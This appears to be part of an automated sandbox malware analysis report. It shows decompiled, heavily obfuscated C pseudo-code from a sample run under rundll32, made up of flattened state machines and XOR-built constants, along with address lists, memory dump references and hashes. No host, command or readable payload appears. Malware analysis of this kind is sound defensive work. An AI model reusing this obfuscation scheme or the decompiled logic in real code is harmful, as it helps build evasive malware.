				_push(_a20);
				_push(1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(1);
				E100056B2(_t127);
				_v24 = 0x41a5;
				_t172 =  &(( &_v60)[7]);
				_v24 = _v24 + 0x21bb;
				_v24 = _v24 ^ 0x00007358;
				_t169 = 0;
				_v28 = 0x71a;
				_t148 = 0xfead4ff;
				_t164 = 0x12;
				_v28 = _v28 * 0x28;
				_v28 = _v28 ^ 0x00016495;
				_v32 = 0xbf26;
				_v32 = _v32 + 0xffff8b18;
				_v32 = _v32 ^ 0x000031b7;
				_v36 = 0x25da;
				_v36 = _v36 ^ 0x27b288f9;
				_v36 = _v36 ^ 0x27b2aeec;
				_v56 = 0xc86;
				_v56 = _v56 * 0x14;
				_v56 = _v56 / _t164;
				_v56 = _v56 | 0x1dd3be64;
				_v56 = _v56 ^ 0x1dd38503;
				_v52 = 0xa82;
				_t165 = 0x49;
				_v52 = _v52 / _t165;
				_v52 = _v52 + 0x548f;
				_v52 = _v52 ^ 0x000056ef;
				_v60 = 0x147a;
				_v60 = _v60 + 0xffff5465;
				_v60 = _v60 + 0x4912;
				_v60 = _v60 + 0x75b6;
				_v60 = _v60 ^ 0x00000d5b;
				_v12 = 0x2808;
				_t166 = 0x3c;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x00007e81;
				_v16 = 0x677c;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x00000f03;
				_v20 = 0x40ea;
				_t73 =  &_v20; // 0x40ea
				_t167 = 7;
				_v20 =  *_t73 / _t167;
				_v20 = _v20 ^ 0x0000696b;
				_v8 = 0x2aca;
				_v8 = _v8 ^ 0x5bcab796;
				_v8 = _v8 ^ 0x5bca9ee4;
				_v40 = 0x8019;
				_v40 = _v40 >> 1;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x00802c80;
				_v44 = 0xa509;
				_v44 = _v44 | 0xfb24deb0;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x93fe8f44;
				_v48 = 0x64c2;
				_v48 = _v48 + 0xffffc005;
				_v48 = _v48 | 0x8cdd04ab;
				_v48 = _v48 ^ 0x8cdd37a9;
				_t168 = _v4;
				while(_t148 != 0x109ed35) {
					if(_t148 == 0xfead4ff) {
						_t148 = 0x2ad569f8;
						continue;
					} else {
						if(_t148 == 0x1649e19d) {
							_t114 =  &_v20; // 0x40ea
							E10017A72(_a20, _v56, 1, 1, _v52, _v60, _v12, _t148, _a8, _v16,  *_t114, _v4);
							_t172 =  &(_t172[0xa]);
							_t148 = 0x109ed35;
							_t169 =  !=  ? 1 : _t169;
							continue;
						} else {
							if(_t148 == 0x2ad569f8) {
								_t142 = E10014DBD();
								_t168 = _t142;
								if(_t142 != 0xffffffff) {
									_t148 = 0x2e3949fa;
									continue;
								}
							} else {
								if(_t148 != 0x2e3949fa) {
									L13:
									if(_t148 != 0x14320148) {
										continue;
									}
								} else {
									_t111 =  &_v28; // 0x40ea
									_t145 = E1001D472(_t168,  *_t111, _v32, _v36,  &_v4);
									_t172 =  &(_t172[3]);
									if(_t145 != 0) {
										_t148 = 0x1649e19d;
										continue;
									}
								}
							}
						}
					}
					return _t169;
				}
				E100078F0(_v4, _v8, _v40, _v44, _v48);
				_t172 =  &(_t172[3]);
				_t148 = 0x14320148;
				goto L13;
			}




























                                                                        0x10004be5
                                                                        0x10004bec
                                                                        0x10004bed
                                                                        0x10004bf1
                                                                        0x10004bf5
                                                                        0x10004bf9
                                                                        0x10004bfa
                                                                        0x10004bfb
                                                                        0x10004c00
                                                                        0x10004c08
                                                                        0x10004c0b
                                                                        0x10004c15
                                                                        0x10004c1d
                                                                        0x10004c1f
                                                                        0x10004c27
                                                                        0x10004c33
                                                                        0x10004c36
                                                                        0x10004c3a
                                                                        0x10004c42
                                                                        0x10004c4a
                                                                        0x10004c52
                                                                        0x10004c5a
                                                                        0x10004c62
                                                                        0x10004c6a
                                                                        0x10004c72
                                                                        0x10004c7f
                                                                        0x10004c8b
                                                                        0x10004c8f
                                                                        0x10004c97
                                                                        0x10004c9f
                                                                        0x10004cab
                                                                        0x10004cb0
                                                                        0x10004cb6
                                                                        0x10004cbe
                                                                        0x10004cc6
                                                                        0x10004cce
                                                                        0x10004cd6
                                                                        0x10004cde
                                                                        0x10004ce6
                                                                        0x10004cee
                                                                        0x10004cfa
                                                                        0x10004cff
                                                                        0x10004d05
                                                                        0x10004d0d
                                                                        0x10004d15
                                                                        0x10004d1a
                                                                        0x10004d22
                                                                        0x10004d2a
                                                                        0x10004d2e
                                                                        0x10004d31
                                                                        0x10004d35
                                                                        0x10004d3d
                                                                        0x10004d45
                                                                        0x10004d4d
                                                                        0x10004d55
                                                                        0x10004d5d
                                                                        0x10004d61
                                                                        0x10004d66
                                                                        0x10004d6e
                                                                        0x10004d7b
                                                                        0x10004d83
                                                                        0x10004d88
                                                                        0x10004d90
                                                                        0x10004d98
                                                                        0x10004da0
                                                                        0x10004da8
                                                                        0x10004db0
                                                                        0x10004db4
                                                                        0x10004dc6
                                                                        0x10004e60
                                                                        0x00000000
                                                                        0x10004dcc
                                                                        0x10004dce
                                                                        0x10004e26
                                                                        0x10004e49
                                                                        0x10004e4e
                                                                        0x10004e51
                                                                        0x10004e58
                                                                        0x00000000
                                                                        0x10004dd0
                                                                        0x10004dd6
                                                                        0x10004e0f
                                                                        0x10004e14
                                                                        0x10004e19
                                                                        0x10004e1b
                                                                        0x00000000
                                                                        0x10004e1b
                                                                        0x10004dd8
                                                                        0x10004dde
                                                                        0x10004e8b
                                                                        0x10004e91
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10004de4
                                                                        0x10004df3
                                                                        0x10004df7
                                                                        0x10004dfc
                                                                        0x10004e01
                                                                        0x10004e07
                                                                        0x00000000
                                                                        0x10004e07
                                                                        0x10004e01
                                                                        0x10004dde
                                                                        0x10004dd6
                                                                        0x10004dce
                                                                        0x10004ea0
                                                                        0x10004ea0
                                                                        0x10004e7e
                                                                        0x10004e83
                                                                        0x10004e86
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Xs$[$ki$|g$@<$V
                                                                        • API String ID: 0-1782315456
                                                                        • Opcode ID: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
                                                                        • Instruction ID: d5753dc0bbcc3aea306371c6b81f33b505aaf0871162b6c422c34f7178ca26c7
                                                                        • Opcode Fuzzy Hash: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
                                                                        • Instruction Fuzzy Hash: 2C6155B1509340AFE794CF21C88581FBBF2FBD4798F414A1DF695462A0C775DA098B87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001231B, Relevance: 6.6, Strings: 5, Instructions: 327COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E1001231B(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t296;
				void* _t321;
				intOrPtr _t325;
				void* _t327;
				short _t328;
				void* _t334;
				signed int _t338;
				signed int _t339;
				void* _t341;
				intOrPtr* _t377;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t390;
				signed int _t391;
				signed int _t394;
				signed int* _t396;
				void* _t398;

				_push(_a12);
				_t377 = _a4;
				_push(_a8);
				_push(_t377);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t296);
				_v8 = _v8 & 0x00000000;
				_t396 =  &(( &_v124)[5]);
				_v96 = 0x1023;
				_v96 = _v96 ^ 0xe47dc4fc;
				_t341 = 0x27600fdb;
				_v96 = _v96 ^ 0x32abab6c;
				_v96 = _v96 | 0x6d93312b;
				_v96 = _v96 ^ 0xffd78252;
				_v16 = 0xdaf7;
				_t381 = 0x16;
				_v16 = _v16 / _t381;
				_v16 = _v16 ^ 0x000001c4;
				_v20 = 0x6395;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x18e533fd;
				_v88 = 0xa972;
				_v88 = _v88 | 0xad5f380f;
				_t382 = 0x43;
				_v88 = _v88 / _t382;
				_v88 = _v88 * 0x65;
				_v88 = _v88 ^ 0x055ac7b0;
				_v44 = 0xf64e;
				_v44 = _v44 ^ 0xc329889b;
				_v44 = _v44 ^ 0xc3290878;
				_v120 = 0x240c;
				_v120 = _v120 ^ 0x7b0f575c;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x9190;
				_v120 = _v120 ^ 0xee6af427;
				_v68 = 0x2382;
				_v68 = _v68 ^ 0xaf4a09f1;
				_v68 = _v68 + 0xffff93b5;
				_v68 = _v68 ^ 0xaf49ee02;
				_v124 = 0xa6c0;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 << 0xf;
				_v124 = _v124 * 0x50;
				_v124 = _v124 ^ 0x01900d65;
				_v48 = 0x59b;
				_v48 = _v48 | 0x1d932e17;
				_v48 = _v48 ^ 0x1d93434e;
				_v32 = 0x7dc;
				_v32 = _v32 | 0x7a0a60f4;
				_v32 = _v32 ^ 0x7a0a2147;
				_v36 = 0xa0ae;
				_v36 = _v36 | 0x35bc5344;
				_v36 = _v36 ^ 0x35bce77d;
				_v40 = 0xf45a;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x00007c19;
				_v24 = 0xd9df;
				_v24 = _v24 + 0x4204;
				_v24 = _v24 ^ 0x00011e54;
				_v28 = 0xf9ca;
				_v28 = _v28 ^ 0x4b2056fe;
				_v28 = _v28 ^ 0x4b20b363;
				_v112 = 0xa35c;
				_t383 = 7;
				_v112 = _v112 / _t383;
				_v112 = _v112 >> 8;
				_v112 = _v112 ^ 0x00007415;
				_v100 = 0x2d35;
				_v100 = _v100 | 0x4fbfcbdf;
				_v100 = _v100 + 0xffffcb51;
				_v100 = _v100 ^ 0x4fbfa459;
				_v104 = 0x199f;
				_v104 = _v104 | 0xa6a9e361;
				_v104 = _v104 ^ 0x0fa1695b;
				_t384 = 0x70;
				_v104 = _v104 * 0x34;
				_v104 = _v104 ^ 0x55bdfdea;
				_v108 = 0x6dac;
				_v108 = _v108 + 0x7618;
				_v108 = _v108 | 0xd437a5be;
				_v108 = _v108 >> 5;
				_v108 = _v108 ^ 0x06a1e076;
				_v52 = 0xb587;
				_v52 = _v52 / _t384;
				_v52 = _v52 | 0x698df789;
				_v52 = _v52 ^ 0x698dbdb0;
				_v56 = 0xcc44;
				_t385 = 0x54;
				_v56 = _v56 / _t385;
				_v56 = _v56 + 0xffff840a;
				_v56 = _v56 ^ 0xffffb5b3;
				_v92 = 0x53df;
				_t386 = 0x38;
				_v92 = _v92 * 0x2b;
				_v92 = _v92 ^ 0x72368f4f;
				_v92 = _v92 * 0x5f;
				_v92 = _v92 ^ 0x6300adc9;
				_v60 = 0xeb4;
				_v60 = _v60 ^ 0x82e65f12;
				_v60 = _v60 * 0x12;
				_v60 = _v60 ^ 0x3431ffe0;
				_v76 = 0x9ea1;
				_v76 = _v76 / _t386;
				_v76 = _v76 << 9;
				_v76 = _v76 | 0x56c1a970;
				_v76 = _v76 ^ 0x56c5f8a5;
				_v80 = 0xe36f;
				_t387 = 0x71;
				_v80 = _v80 / _t387;
				_v80 = _v80 >> 0xa;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 ^ 0x00002ab6;
				_v12 = 0xbe7b;
				_v12 = _v12 ^ 0xb73b4484;
				_v12 = _v12 ^ 0xb73bd21d;
				_v84 = 0x2f05;
				_v84 = _v84 ^ 0x486d0961;
				_v84 = _v84 * 0x18;
				_v84 = _v84 ^ 0xccd4c0a7;
				_v84 = _v84 ^ 0x06ef1f50;
				_v72 = 0xb051;
				_v72 = _v72 | 0x44f81078;
				_t394 = _v4;
				_t338 = _v4;
				_v72 = _v72 * 0x1b;
				_v72 = _v72 ^ 0x463a9cc3;
				_v116 = 0x904e;
				_v116 = _v116 >> 6;
				_v116 = _v116 | 0x00eb6e86;
				_v116 = _v116 >> 8;
				_v116 = _v116 ^ 0x0000eb6e;
				_v64 = 0x30db;
				_v64 = _v64 + 0xffffb1c5;
				_v64 = _v64 ^ 0x9ee5eb39;
				_v64 = _v64 ^ 0x611a0999;
				while(1) {
					_t321 = 0x5942909;
					while(1) {
						L2:
						_t398 = _t341 - 0x19684f4e;
						if(_t398 > 0) {
							break;
						}
						if(_t398 == 0) {
							E100091CD(_v52, _v56, _v92, _t394, _v60);
							_t396 =  &(_t396[3]);
							_t341 = 0x203b69b2;
							while(1) {
								_t321 = 0x5942909;
								goto L2;
							}
						} else {
							if(_t341 == 0x45bbbee) {
								 *(_t377 + 4) = _v64;
								_t325 = E1000C6EF(_t377 + 4, _v96, _v100, _v104, _t338 - 1, _t394, _v108);
								_t396 =  &(_t396[5]);
								 *_t377 = _t325;
								_t341 = 0x19684f4e;
								while(1) {
									_t321 = 0x5942909;
									goto L2;
								}
							} else {
								if(_t341 == _t321) {
									_t338 = _v116;
									_t379 = _v8;
									if(_t379 != 0) {
										do {
											E10015891(_t379 + 0x2c, _t338 * 2 + _t394, _v32, _v36, _v40);
											_t327 = E1001BBAB(_v24, _v28, _t379 + 0x2c, _v112);
											_t396 =  &(_t396[5]);
											_t339 = _t338 + _t327;
											_t328 = 0x2c;
											 *((short*)(_t394 + _t339 * 2)) = _t328;
											_t338 = _t339 + 1;
											_t379 =  *((intOrPtr*)(_t379 + 0x1c));
										} while (_t379 != 0);
										_t321 = 0x5942909;
									}
									_t391 = _v4;
									_t341 = 0x45bbbee;
									goto L13;
								} else {
									if(_t341 == 0xb31c45f) {
										_t391 = _v72;
										_t380 = _v8;
										_v4 = _t391;
										if(_t380 != 0) {
											do {
												_t334 = E1001BBAB(_v44, _v120, _t380 + 0x2c, _v68);
												_t380 =  *((intOrPtr*)(_t380 + 0x1c));
												_t391 = _t391 + 1 + _t334;
											} while (_t380 != 0);
											_v4 = _t391;
											_t321 = 0x5942909;
										}
										_t341 = 0xd80ae87;
										L13:
										_t377 = _a4;
										continue;
									} else {
										if(_t341 == 0xd80ae87) {
											_push(_t341);
											_t394 = E100157E8(_t391 + _t391);
											_t321 = 0x5942909;
											_t341 =  !=  ? 0x5942909 : 0x203b69b2;
											continue;
										}
									}
								}
							}
						}
						L29:
						if(_t341 != 0x178c149f) {
							continue;
						}
						return 0 |  *_t377 != 0x00000000;
					}
					if(_t341 == 0x203b69b2) {
						_t378 = _v8;
						if(_t378 != 0) {
							do {
								_t390 =  *(_t378 + 0x1c);
								E100091CD(_v76, _v80, _v12, _t378, _v84);
								_t396 =  &(_t396[3]);
								_t378 = _t390;
							} while (_t390 != 0);
							_t321 = 0x5942909;
						}
						_t377 = _a4;
						_t341 = 0x178c149f;
					} else {
						if(_t341 == 0x27600fdb) {
							_t341 = 0x2d4988fb;
							goto L2;
						} else {
							if(_t341 == 0x2d4988fb) {
								E100142E2( &_v8, E10005EB9, _v20, _v88);
								_t396 =  &(_t396[3]);
								_t341 = 0xb31c45f;
								continue;
							}
						}
					}
					goto L29;
				}
			}



























































                                                                        0x10012322
                                                                        0x10012329
                                                                        0x10012330
                                                                        0x10012337
                                                                        0x10012338
                                                                        0x10012339
                                                                        0x1001233a
                                                                        0x1001233f
                                                                        0x10012347
                                                                        0x1001234a
                                                                        0x10012354
                                                                        0x1001235c
                                                                        0x10012361
                                                                        0x10012369
                                                                        0x10012371
                                                                        0x10012379
                                                                        0x10012387
                                                                        0x1001238c
                                                                        0x10012395
                                                                        0x100123a0
                                                                        0x100123a8
                                                                        0x100123ad
                                                                        0x100123b5
                                                                        0x100123bd
                                                                        0x100123c9
                                                                        0x100123cc
                                                                        0x100123d5
                                                                        0x100123d9
                                                                        0x100123e1
                                                                        0x100123e9
                                                                        0x100123f1
                                                                        0x100123f9
                                                                        0x10012401
                                                                        0x10012409
                                                                        0x1001240e
                                                                        0x10012416
                                                                        0x1001241e
                                                                        0x10012426
                                                                        0x1001242e
                                                                        0x10012436
                                                                        0x1001243e
                                                                        0x10012446
                                                                        0x1001244b
                                                                        0x10012455
                                                                        0x10012459
                                                                        0x10012461
                                                                        0x10012469
                                                                        0x10012471
                                                                        0x10012479
                                                                        0x10012481
                                                                        0x10012489
                                                                        0x10012491
                                                                        0x10012499
                                                                        0x100124a1
                                                                        0x100124a9
                                                                        0x100124b1
                                                                        0x100124b6
                                                                        0x100124be
                                                                        0x100124c6
                                                                        0x100124ce
                                                                        0x100124d6
                                                                        0x100124de
                                                                        0x100124e6
                                                                        0x100124ee
                                                                        0x10012506
                                                                        0x1001250b
                                                                        0x10012511
                                                                        0x10012516
                                                                        0x1001251e
                                                                        0x10012526
                                                                        0x1001252e
                                                                        0x10012536
                                                                        0x1001253e
                                                                        0x10012546
                                                                        0x1001254e
                                                                        0x1001255b
                                                                        0x1001255e
                                                                        0x10012562
                                                                        0x1001256a
                                                                        0x10012572
                                                                        0x1001257a
                                                                        0x10012582
                                                                        0x10012587
                                                                        0x1001258f
                                                                        0x1001259f
                                                                        0x100125a3
                                                                        0x100125ab
                                                                        0x100125b3
                                                                        0x100125bf
                                                                        0x100125c4
                                                                        0x100125ca
                                                                        0x100125d2
                                                                        0x100125da
                                                                        0x100125e7
                                                                        0x100125ea
                                                                        0x100125ee
                                                                        0x100125fb
                                                                        0x100125ff
                                                                        0x10012607
                                                                        0x1001260f
                                                                        0x1001261c
                                                                        0x10012620
                                                                        0x10012628
                                                                        0x10012638
                                                                        0x1001263c
                                                                        0x10012641
                                                                        0x10012649
                                                                        0x10012651
                                                                        0x1001265d
                                                                        0x10012660
                                                                        0x10012664
                                                                        0x10012669
                                                                        0x1001266e
                                                                        0x10012676
                                                                        0x10012681
                                                                        0x1001268c
                                                                        0x10012697
                                                                        0x1001269f
                                                                        0x100126ac
                                                                        0x100126b0
                                                                        0x100126b8
                                                                        0x100126c0
                                                                        0x100126c8
                                                                        0x100126d5
                                                                        0x100126dc
                                                                        0x100126ea
                                                                        0x100126ee
                                                                        0x100126f6
                                                                        0x100126fe
                                                                        0x10012703
                                                                        0x1001270b
                                                                        0x10012710
                                                                        0x10012718
                                                                        0x10012720
                                                                        0x10012728
                                                                        0x10012730
                                                                        0x10012738
                                                                        0x10012738
                                                                        0x1001273d
                                                                        0x1001273d
                                                                        0x1001273d
                                                                        0x10012743
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10012749
                                                                        0x100128a1
                                                                        0x100128a6
                                                                        0x100128a9
                                                                        0x10012738
                                                                        0x10012738
                                                                        0x00000000
                                                                        0x10012738
                                                                        0x1001274f
                                                                        0x10012755
                                                                        0x10012869
                                                                        0x1001287c
                                                                        0x10012881
                                                                        0x10012884
                                                                        0x10012886
                                                                        0x10012738
                                                                        0x10012738
                                                                        0x00000000
                                                                        0x10012738
                                                                        0x1001275b
                                                                        0x1001275d
                                                                        0x100127f0
                                                                        0x100127f4
                                                                        0x100127fd
                                                                        0x100127ff
                                                                        0x10012819
                                                                        0x10012831
                                                                        0x10012836
                                                                        0x10012839
                                                                        0x1001283d
                                                                        0x1001283e
                                                                        0x10012843
                                                                        0x10012844
                                                                        0x10012847
                                                                        0x1001284b
                                                                        0x1001284b
                                                                        0x10012850
                                                                        0x10012857
                                                                        0x00000000
                                                                        0x10012763
                                                                        0x10012769
                                                                        0x1001279c
                                                                        0x100127a0
                                                                        0x100127a7
                                                                        0x100127b0
                                                                        0x100127b2
                                                                        0x100127c2
                                                                        0x100127c7
                                                                        0x100127cc
                                                                        0x100127cf
                                                                        0x100127d3
                                                                        0x100127da
                                                                        0x100127da
                                                                        0x100127df
                                                                        0x100127e4
                                                                        0x100127e4
                                                                        0x00000000
                                                                        0x1001276b
                                                                        0x10012771
                                                                        0x1001277f
                                                                        0x10012788
                                                                        0x1001278a
                                                                        0x10012797
                                                                        0x00000000
                                                                        0x10012797
                                                                        0x10012771
                                                                        0x10012769
                                                                        0x1001275d
                                                                        0x10012755
                                                                        0x10012943
                                                                        0x10012950
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10012964
                                                                        0x10012964
                                                                        0x100128b9
                                                                        0x10012902
                                                                        0x1001290b
                                                                        0x1001290d
                                                                        0x10012911
                                                                        0x10012924
                                                                        0x10012929
                                                                        0x1001292c
                                                                        0x1001292e
                                                                        0x10012932
                                                                        0x10012932
                                                                        0x10012937
                                                                        0x1001293e
                                                                        0x100128bb
                                                                        0x100128c1
                                                                        0x100128f8
                                                                        0x00000000
                                                                        0x100128c3
                                                                        0x100128c9
                                                                        0x100128e6
                                                                        0x100128eb
                                                                        0x100128ee
                                                                        0x00000000
                                                                        0x100128ee
                                                                        0x100128c9
                                                                        0x100128c1
                                                                        0x00000000
                                                                        0x100128b9

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5-$G!z$amH$n$o
                                                                        • API String ID: 0-2418732634
                                                                        • Opcode ID: 3887bab40c44b1641d7bbcfab6a6f4e19126a941134cafb96a2f4f2f1bff6032
                                                                        • Instruction ID: 6f407b80c570a864ccd2820a3afddbd72b69261bff4ce0457850b771c8ca1b73
                                                                        • Opcode Fuzzy Hash: 3887bab40c44b1641d7bbcfab6a6f4e19126a941134cafb96a2f4f2f1bff6032
                                                                        • Instruction Fuzzy Hash: 7DF141754083818FD368CF25C58664FBBE1FBC4758F60890DF29A9A260CB75D989CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001C04C, Relevance: 6.4, Strings: 5, Instructions: 182COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E1001C04C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t150;
				void* _t174;
				void* _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a8);
				_t213 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t150);
				_v80 = 0xc784;
				_t217 =  &(( &_v112)[4]);
				_v80 = _v80 << 4;
				_t214 = 0;
				_t189 = 0x33fb58ad;
				_t181 = 0x6b;
				_v80 = _v80 * 0x28;
				_v80 = _v80 ^ 0x01f2d8b7;
				_v84 = 0x50fb;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 + 0x937e;
				_v84 = _v84 ^ 0x0000fdde;
				_v56 = 0x327d;
				_v56 = _v56 + 0xffffdcf3;
				_v56 = _v56 ^ 0x00004b6f;
				_v88 = 0x146d;
				_v88 = _v88 ^ 0x8349746f;
				_v88 = _v88 / _t181;
				_v88 = _v88 ^ 0x013a5398;
				_v60 = 0xe2fe;
				_t182 = 0x25;
				_v60 = _v60 * 0x79;
				_v60 = _v60 ^ 0x006b2efa;
				_v64 = 0xc02b;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x00002cf4;
				_v92 = 0x8680;
				_v92 = _v92 * 0x7e;
				_v92 = _v92 + 0xffff14d8;
				_v92 = _v92 ^ 0x004119fe;
				_v96 = 0x22ae;
				_v96 = _v96 * 0x57;
				_v96 = _v96 * 0x15;
				_v96 = _v96 ^ 0x00f7010a;
				_v68 = 0x9e2a;
				_v68 = _v68 << 0xa;
				_v68 = _v68 ^ 0x0278df5a;
				_v100 = 0x70f1;
				_v100 = _v100 + 0x9f07;
				_v100 = _v100 << 7;
				_v100 = _v100 ^ 0x0087eaa7;
				_v72 = 0xae27;
				_v72 = _v72 + 0xffff81b6;
				_v72 = _v72 ^ 0x00001dbd;
				_v76 = 0xeb69;
				_v76 = _v76 + 0xe753;
				_v76 = _v76 / _t182;
				_v76 = _v76 ^ 0x00001cc5;
				_v104 = 0x4553;
				_v104 = _v104 + 0xffffebb9;
				_t183 = 0x7e;
				_v104 = _v104 / _t183;
				_t184 = 0xe;
				_v104 = _v104 / _t184;
				_v104 = _v104 ^ 0x00003b66;
				_v108 = 0x5045;
				_t185 = 0x38;
				_v108 = _v108 / _t185;
				_t186 = 0x45;
				_v108 = _v108 * 0x58;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 ^ 0x002412f1;
				_v112 = 0x2d31;
				_v112 = _v112 / _t186;
				_v112 = _v112 ^ 0x7267b250;
				_v112 = _v112 + 0xd72;
				_v112 = _v112 ^ 0x7267a792;
				while(_t189 != 0x8879467) {
					if(_t189 == 0x1932f021) {
						_t174 = E1001D290(_v88, _v60, _v64, _t213, _v92,  &_v52);
						_t217 =  &(_t217[4]);
						__eflags = _t174;
						if(__eflags != 0) {
							_t189 = 0x36f0c2c4;
							continue;
						}
					} else {
						if(_t189 == 0x33be0ba1) {
							_t147 = _t213 + 8; // 0x3ba4bc1b
							__eflags = E10009899(_t147, _v76, __eflags,  &_v52, _v104, _v108, _v112);
							_t214 =  !=  ? 1 : _t214;
							__eflags = _t214;
						} else {
							if(_t189 == 0x33fb58ad) {
								_t189 = 0x8879467;
								continue;
							} else {
								if(_t189 != 0x36f0c2c4) {
									L12:
									__eflags = _t189 - 0x2249cb7b;
									if(__eflags != 0) {
										continue;
									} else {
									}
								} else {
									_t130 = _t213 + 4; // 0x3ba4bc17
									_t180 = E1001D290(_v96, _v68, _v100, _t130, _v72,  &_v52);
									_t217 =  &(_t217[4]);
									if(_t180 != 0) {
										_t189 = 0x33be0ba1;
										continue;
									}
								}
							}
						}
					}
					return _t214;
				}
				E1001F3E9(_v80, _v84, _v56, _a4,  &_v52);
				_t217 =  &(_t217[3]);
				_t189 = 0x1932f021;
				goto L12;
			}
































                                                                        0x1001c053
                                                                        0x1001c05a
                                                                        0x1001c05c
                                                                        0x1001c063
                                                                        0x1001c064
                                                                        0x1001c065
                                                                        0x1001c06a
                                                                        0x1001c072
                                                                        0x1001c075
                                                                        0x1001c081
                                                                        0x1001c083
                                                                        0x1001c08a
                                                                        0x1001c08d
                                                                        0x1001c091
                                                                        0x1001c099
                                                                        0x1001c0a1
                                                                        0x1001c0a6
                                                                        0x1001c0ae
                                                                        0x1001c0b6
                                                                        0x1001c0be
                                                                        0x1001c0c6
                                                                        0x1001c0ce
                                                                        0x1001c0d6
                                                                        0x1001c0e6
                                                                        0x1001c0ea
                                                                        0x1001c0f2
                                                                        0x1001c0ff
                                                                        0x1001c102
                                                                        0x1001c106
                                                                        0x1001c10e
                                                                        0x1001c116
                                                                        0x1001c11b
                                                                        0x1001c123
                                                                        0x1001c130
                                                                        0x1001c134
                                                                        0x1001c13c
                                                                        0x1001c144
                                                                        0x1001c151
                                                                        0x1001c15a
                                                                        0x1001c15e
                                                                        0x1001c166
                                                                        0x1001c16e
                                                                        0x1001c173
                                                                        0x1001c17b
                                                                        0x1001c183
                                                                        0x1001c18b
                                                                        0x1001c190
                                                                        0x1001c198
                                                                        0x1001c1a0
                                                                        0x1001c1a8
                                                                        0x1001c1b0
                                                                        0x1001c1b8
                                                                        0x1001c1c8
                                                                        0x1001c1cc
                                                                        0x1001c1d4
                                                                        0x1001c1dc
                                                                        0x1001c1e8
                                                                        0x1001c1ed
                                                                        0x1001c1f7
                                                                        0x1001c1fc
                                                                        0x1001c202
                                                                        0x1001c20f
                                                                        0x1001c21b
                                                                        0x1001c220
                                                                        0x1001c22b
                                                                        0x1001c22c
                                                                        0x1001c235
                                                                        0x1001c239
                                                                        0x1001c241
                                                                        0x1001c254
                                                                        0x1001c258
                                                                        0x1001c260
                                                                        0x1001c268
                                                                        0x1001c270
                                                                        0x1001c27a
                                                                        0x1001c2db
                                                                        0x1001c2e0
                                                                        0x1001c2e3
                                                                        0x1001c2e5
                                                                        0x1001c2e7
                                                                        0x00000000
                                                                        0x1001c2e7
                                                                        0x1001c27c
                                                                        0x1001c27e
                                                                        0x1001c32d
                                                                        0x1001c344
                                                                        0x1001c346
                                                                        0x1001c346
                                                                        0x1001c284
                                                                        0x1001c28a
                                                                        0x1001c2c1
                                                                        0x00000000
